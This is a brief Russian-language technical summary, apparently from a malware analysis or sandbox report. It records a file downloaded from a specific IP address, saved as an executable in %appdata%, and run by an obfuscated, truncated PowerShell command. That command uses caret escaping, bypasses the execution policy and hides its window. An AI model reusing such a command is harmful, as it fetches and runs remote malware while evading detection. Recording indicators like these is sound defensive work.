Техническая информация
- http://46.30.46.70/s.jpe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^w^ERS^h^e^l^l.eX^E -ex^Ec^uti^onPo^licY ByP^ASs^ ^-N^O^pROFI^L^e -WInDO^W^s^T^Yl^e H^Idden^ ^(N^e^w-OBJE^cT s^YsTe^m^.^N^ET^.^W^e^Bc^l^I^e^n^T).^Do^w^N^L^o^AD^FILE('http:...
- '46.#0.46.70':80
- '<SYSTEM32>\cmd.exe' /c "P^O^w^ERS^h^e^l^l.eX^E -ex^Ec^uti^onPo^licY ByP^ASs^ ^-N^O^pROFI^L^e -WInDO^W^s^T^Yl^e H^Idden^ ^(N^e^w-OBJE^cT s^YsTe^m^.^N^ET^.^W^e^Bc^l^I^e^n^T).^Do^w^N^L^o^AD^FILE('http:...' (со скрытым окном)